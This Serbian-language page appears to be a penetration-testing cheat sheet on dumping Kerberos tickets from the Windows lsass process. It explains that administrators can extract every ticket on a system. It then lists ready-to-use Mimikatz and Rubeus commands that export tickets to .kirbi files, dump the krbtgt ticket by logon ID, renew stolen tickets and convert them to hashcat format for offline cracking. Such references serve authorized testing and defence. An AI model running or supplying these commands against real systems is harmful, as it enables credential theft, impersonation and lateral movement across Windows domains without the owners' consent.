Karte u Windowsu se upravljaju i čuvaju od strane lsass (Local Security Authority Subsystem Service) procesa, odgovornog za upravljanje sigurnosnim politikama. Da biste izvukli ove karte, neophodno je da komunicirate sa lsass procesom. Neadministrativni korisnik može pristupiti samo svojim kartama, dok administrator ima privilegiju da izvuče sve karte sa sistema. Za takve operacije, široko se koriste alati Mimikatz i Rubeus, koji nude različite komande i funkcionalnosti.

Mimikatz

Mimikatz je vešti alat koji može da komunicira sa Windows sigurnošću. Koristi se ne samo za izvlačenje karata, već i za razne druge sigurnosne operacije.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus je alat posebno prilagođen za interakciju i manipulaciju Kerberosom. Koristi se za izvlačenje i upravljanje karticama, kao i za druge aktivnosti vezane za Kerberos.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Prilikom korišćenja ovih komandi, obavezno zamenite placeholder-e poput <BASE64_TICKET> i <luid> sa stvarnim Base64 enkodiranim tiketom i Logon ID-jem, redom. Ovi alati pružaju obimnu funkcionalnost za upravljanje tiketima i interakciju sa sigurnosnim mehanizmima Windows-a.

Reference

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/